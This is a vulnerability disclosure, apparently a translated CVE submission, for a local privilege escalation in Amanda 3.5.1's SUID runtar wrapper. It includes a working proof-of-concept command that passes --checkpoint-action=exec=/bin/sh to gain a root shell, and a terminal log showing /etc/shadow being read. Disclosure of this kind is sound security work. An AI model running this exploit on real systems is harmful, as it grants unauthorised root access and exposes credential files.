
Amanda 3.5.1 second LPE.
[Рекомендуемое описание] Уязвимость повышения привилегий была обнаружена в Amanda 3.5.1, которая может повысить пользователя backup до привилегий root. Уязвимым компонентом является SUID-программа runtar, которая представляет собой просто обёртку для запуска /usr/bin/tar с определёнными аргументами, которые контролируются атакующим. Программа не проверяет корректно аргументы, передаваемые бинарному файлу tar (она предполагает, что все аргументы должны быть вида --ARG VALUE, но мы можем передать --ARG=VALUE как один аргумент).
[Дополнительная информация] Эта уязвимость может быть использована для выполнения кода, отказа в обслуживании, повышения привилегий и раскрытия информации. Это PoC для её эксплуатации и получения root-оболочки: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Тип уязвимости Другое] Неверная проверка аргументов.
[Производитель продукта] Amanda
[Затронутая кодовая база продукта] runtar - 3.5.1
[Затронутый компонент]
Затронутый SUID-бинарный файл : runtar Затронутый файл : runtar.c Затронутые строки кода начинаются со строки 162.
[Тип атаки] Локальная
[Воздействие: выполнение кода] true
[Воздействие: отказ в обслуживании] true
[Воздействие: повышение привилегий] true
[Воздействие: раскрытие информации] true
[Векторы атаки]
Для эксплуатации бинарного файла достаточно передать специально сформированные аргументы SUID-бинарному файлу runtar для повышения привилегий до root.
[Ссылка] http://www.amanda.org/
[Обнаружил] Maher Azzouzi
Используйте CVE-2022-37705.